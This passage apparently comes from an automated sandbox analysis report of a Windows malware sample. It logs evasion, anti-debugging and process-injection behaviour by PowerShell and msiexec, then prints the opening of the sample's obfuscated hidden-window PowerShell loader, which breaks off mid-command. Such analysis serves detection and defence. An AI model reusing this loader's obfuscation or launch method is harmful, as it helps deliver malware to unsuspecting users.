                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040DD85
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5464Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4387Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6261Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3570Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.9 %
                Source: C:\Windows\SysWOW64\msiexec.exeAPI coverage: 8.3 %
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6108Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6592Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 2336Thread sleep count: 201 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 2336Thread sleep time: -100500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5260Thread sleep count: 2023 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5260Thread sleep time: -6069000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5260Thread sleep count: 7420 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exe TID: 5260Thread sleep time: -22260000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_254C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,9_2_254C10F1
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040AE51 FindFirstFileW,FindNextFileW,14_2_0040AE51
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 16_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,16_2_00407EF8
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_00418981 memset,GetSystemInfo,14_2_00418981
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: msiexec.exe, 00000009.00000003.2213273303.00000000095A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: powershell.exe, 00000002.00000002.1850495888.00000299B8AEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00A1D8A4 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,4_2_00A1D8A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_254C60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_254C60E2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040DD85
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 14_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,14_2_004044A4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_254C4AB4 mov eax, dword ptr fs:[00000030h]9_2_254C4AB4
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_254C724E GetProcessHeap,9_2_254C724E
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_254C60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_254C60E2
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_254C2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_254C2B1C
                Source: C:\Windows\SysWOW64\msiexec.exeCode function: 9_2_254C2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_254C2639

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Source: Yara matchFile source: amsi64_1188.amsi.csv, type: OTHER
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1188, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3488, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3660000Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Enfect Tictoc Hellebardistens Skovrankernes Redoblingers Soloth #>;$Rawboned31='Observationsklasser';<#Calvinistically Brunstiges Matroser Researched #>;$Anisometropic=$Booed+$host.UI; function Overfallen($Subantarctic161){If ($Anisometropic) {$Fredningerne++;}$Ponceau=$Lsevrdiges+$Subantarctic161.'Length'-$Fredningerne; for( $Unsullenly=4;$Unsullenly -lt $Ponceau;$Unsullenly+=5){$Prikkendes=$Unsullenly;$Cembalister+=$Subantarctic161[$Unsullenly];$Overproductive='Mglernes';}$Cembalister;}function Indsigelser($bullaces){ & ($Klassikernes130) ($bullaces);}$Resistante=Overfallen ' upeMRdstoHalvz teriAntelja el Un aDogw/Forl ';$Resistante+=Overfallen ' ajs5N.en. eng0 or Step(B,nnWChiriDystnB dedFy koIntewRuf sSkol UninNT mbT unk Chap1Vern0None..yto0Kolo;Kleh LibrWRi.gi rugn D e6Ove 4Dyve;Over ,agdx opf6Lage4klas;Forf SkelrScorvDrif:Vate1Lith3Orga1Bogs.Ber 0Unla)Agle UnliGSynkeVurdcL rekHel oPles/Dane2Form0 Che1Ramb0P on0ublu1B.ll0 Udl1Top. VareFS peiSnasrKuldeIntefMalpoDrifxgr b/Best1.ana3 utw1.igt. Len0Ro,a ';$mbori=Overfallen 'ForsUTeleSPon,e IbiRCom,-unamAsk lGOps 